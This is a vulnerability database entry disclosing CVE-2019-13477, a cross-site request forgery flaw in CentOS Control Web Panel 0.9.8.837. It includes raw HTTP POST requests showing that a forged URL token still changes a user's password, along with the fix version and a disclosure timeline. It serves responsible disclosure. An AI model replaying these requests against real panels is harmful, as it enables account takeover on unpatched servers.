Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtPongtorn Angsuchotmetee1337DAY-ID-33156
HistoryAug 26, 2019 - 12:00 a.m.

CentOS 7.6.1810 Control Web Panel 0.9.8.837 Cross Site Request Forgery Vulnerability

2019-08-2600:00:00
Pongtorn Angsuchotmetee
0day.today
13

0.005 Low

EPSS

Percentile

75.5%

JSON

CentOS version 7.6.1810 with Control Web Panel version 0.9.8.837 suffers from a cross site request forgery vulnerability.

# ====================================================================
# Information
# ====================================================================

Product     : CWP Control Web Panel
version     : 0.9.8.837
Fixed on    : 0.9.8.851
Test on     : CentOS 7.6.1810 (Core)
Reference   : https://control-webpanel.com/
CVE-Number  : 2019-13477


Original request

POST /cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/loader_ajax.php?ajax=list_accounts HTTP/1.1
Host: 192.168.75.148:2087
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.75.148:2087/cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/index.php?module=list_accounts
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 50
Connection: close
Cookie: cwpsrv-bad194011f5ad0cf609c77ad222e50d6=53tt3djbnhepcprdbtoc7uc4d2; _firstImpression=true

accion=changePass&pass=UEBzc3cwcmQ=&username=user1




Even the url has token value,but the token only check for pattern "cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
modify the end of the token value  

POST /cwp_99999999999999999999999999999999/admin/loader_ajax.php?ajax=list_accounts HTTP/1.1
Host: 192.168.75.148:2087
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.75.148:2087/cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/index.php?module=list_accounts
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 50
Connection: close
Cookie: cwpsrv-bad194011f5ad0cf609c77ad222e50d6=53tt3djbnhepcprdbtoc7uc4d2; _firstImpression=true

accion=changePass&pass=UEBzc3cwcmQ=&username=user1



# ====================================================================
# PoC
# ====================================================================
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13477.md


# ====================================================================
# Timeline
# ====================================================================
2019-06-05: Discovered the bug
2019-06-05: Reported to vendor
2019-06-05: Vender accepted the vulnerability
2019-07-17: The vulnerability has been fixed
2019-08-20: published


# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

#  0day.today [2019-12-04]  #

Related

cvelist 1
packetstorm 1
cve 1
prion 1
nvd 1
cvelist
cvelist
CVE-2019-13477
2019-08-21 18:55:04
packetstorm
packetstorm
CentOS 7.6.1810 Control Web Panel 0.9.8.837 Cross Site Request Forgery
2019-08-26 00:00:00
cve
cve
CVE-2019-13477
2019-08-21 19:15:13
prion
prion
Cross site request forgery (csrf)
2019-08-21 19:15:00
nvd
nvd
CVE-2019-13477
2019-08-21 19:15:13

0.005 Low

EPSS

Percentile

75.5%

JSON
Related for 1337DAY-ID-33156
cvelist1packetstorm1cve1prion1nvd1